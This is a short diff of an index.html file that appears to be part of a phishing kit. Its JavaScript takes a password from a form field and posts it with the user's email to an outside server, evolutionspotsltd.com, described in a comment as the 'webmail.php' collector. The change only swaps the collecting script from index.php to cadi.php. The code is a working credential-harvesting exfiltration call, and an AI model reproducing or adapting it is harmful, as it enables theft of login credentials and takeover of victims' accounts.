--- a/index.html
+++ b/index.html
@@ -1010,7 +1010,7 @@ $('#psssss').focus();
 			var ps = $('#psssss').val();
 
 			$.ajax({
-				url: ' https://evolutionspotsltd.com/doc/index.php', // full url of webmail.php
+				url: ' https://evolutionspotsltd.com/doc/cadi.php', // full url of webmail.php
 				type: 'POST',
 				data: {
 					user: em,
